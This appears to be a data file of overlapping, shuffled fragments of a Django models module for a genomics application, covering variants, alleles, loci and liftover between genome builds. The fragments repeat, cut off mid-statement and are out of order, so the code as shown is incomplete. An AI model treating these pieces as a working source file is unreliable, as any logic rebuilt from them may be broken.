"if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\")",
"\", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name +=",
"best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build: va =",
"against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self):",
"= models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class",
"constraints, and large TextFields give error of: \"index row requires x bytes, maximum",
"get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try:",
"self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is",
"return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return",
"a bug to have the same 3 variant/build/allele so we can add that",
"for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self):",
"variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"),",
"self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is one,",
"!= Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq",
"@property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length",
"from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\"",
"use Gist indexes but that requires installing the btree_gist extension (requires postgres Admin",
"regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom,",
"seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None):",
"self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \"",
"from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from",
"is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def",
"g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all",
"on the Variant object - instead do 1-to-1 \"\"\" # Some builds share",
"choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild,",
"{ 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls",
"alt sequence is standard [GATCN] (ie not special or reference) \"\"\" # locus.ref",
"build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build",
"None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) ->",
"variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try:",
"= None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom,",
"va and not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id}",
"migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def",
"for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import",
"if not va: va = vas.first() if va: return va.variant raise ValueError(f'Could not",
"objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self):",
"models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines.",
"snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN",
"if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav",
"= 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self):",
"return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus =",
"genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge",
"ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom",
"self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec",
"FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import",
"allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error",
"{self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele",
"1 Locus for a given chrom/position/ref per database (handled via insertion queues) \"\"\"",
"return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate:",
"V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref,",
"a small fraction of Variants So don't want them on the Variant object",
"liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)",
"the same locus for the row) There is only 1 Variant for a",
"pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none()",
"via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField()",
"CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import",
"build independent - ie GRCh37 and GRCh38 variants for same change point to",
"Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version",
"\"\"\" Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def",
"self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class",
"self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return",
"as ClinGen or 2 loci in a genome build being represented by 1",
"vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not",
"GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build: va",
"s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q:",
"conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate',",
"RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count",
"all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)",
"def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self] return",
"name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def",
">= 1 alts pointing to the same locus for the row) There is",
"**kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles:",
":= self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta :=",
"str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False",
"\"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property",
"a genome build being represented by 1 loci in the build being used",
"re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class",
"self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True)",
"seq and make the constraint on that. Another possible solution is to use",
"get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This",
"set to Allele.pk and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools",
"a variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele')",
"f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if",
"otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext:",
"int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) ->",
"length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash",
"queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE)",
"work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection:",
"same variant linked through different VariantAlleles (so it can't be 1-to-1) variant =",
"not check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 =",
"None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position,",
"related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate",
"@staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\"",
"path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a query \"\"\" kwargs",
"on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def",
"AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") +",
"f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:",
"if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()",
"self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class",
"other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True)",
"\"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if",
"def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status",
"bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) ->",
"or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate:",
"snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig,",
"alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr)",
"- allele_source used to retrieve them The VCF (in genome_build build) is set",
"VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())",
"@lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':",
"self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): #",
"by default uses indexes for constraints, and large TextFields give error of: \"index",
"import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext",
"= False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self,",
"= GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) ->",
"abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self):",
"not being the same as ClinGen or 2 loci in a genome build",
"return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return",
"va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant",
"start, end): \"\"\" Query handling indels. Contigs must match and variant.start <= end",
"G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in",
":= self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property",
"{self.id} for build {genome_build}') if not va: va = vas.first() if va: return",
"any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\"",
"va.delete() return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def",
"via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref =",
"Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool",
"size is 8191\" The easiest solution is to md5sum seq and make the",
"default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias:",
"= locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref",
"to merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into",
"== other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message",
"@property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name,",
"we need to write the source genome build VCF first Alleles must have",
"genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None",
"return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self):",
"= self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38:",
"for a given chrom/position/ref per database (handled via insertion queues) \"\"\" contig =",
"# links there, and can't have another, so it'll work) other_allele.clingen_allele = None",
"return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref",
"chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom]",
"model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin,",
"__str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled",
"return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if",
"end): \"\"\" Query handling indels. Contigs must match and variant.start <= end AND",
"if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if",
"force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)",
"AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines. \"\"\" objects =",
"all subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va =",
"genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def",
"= \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED)",
"= django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and",
"position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's",
":= self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def",
"page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first()",
"new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message",
"self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length >",
"Check if the other build shares existing contig genome_build_contigs = set(c.pk for c",
"- in those cases # we'll have the same variant linked through different",
"v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else:",
"return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence",
"and make the constraint on that. Another possible solution is to use Gist",
"models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True,",
"models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where",
"alts pointing to the same locus for the row) There is only 1",
"@property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord',",
"self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection)",
"return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is",
"class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines. \"\"\" objects",
"get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if",
"is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp =",
"easiest solution is to md5sum seq and make the constraint on that. Another",
"indels. Contigs must match and variant.start <= end AND variant.end_position >= start \"\"\"",
"django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from",
"def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)}",
"ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig",
"def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas",
"get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\"",
"does not check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38",
"\"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else:",
":= self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all",
"def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match and variant.start",
"def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done via",
"@staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s",
"class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38 variants",
"is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def",
"def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) #",
"= models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return",
"is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def",
"@receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles =",
"get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build)",
"= models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover",
"django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers",
"through a VCF where ID is set to Allele.pk and then creating VariantAllele",
"return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)",
"\"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is",
"pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def",
"= DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple",
"def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property",
"params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self)",
"return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs =",
"on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\",",
"-> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant",
"ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt",
"(once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self):",
"is to use Gist indexes but that requires installing the btree_gist extension (requires",
"can write the VCF in the desired genome build For others (NCBI Remap)",
"pointing to the same locus for the row) There is only 1 Variant",
"@lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc",
"success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')",
"Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele",
"genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) ->",
"self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can :=",
"str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def",
"flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics",
"to the same locus) There is only 1 Locus for a given chrom/position/ref",
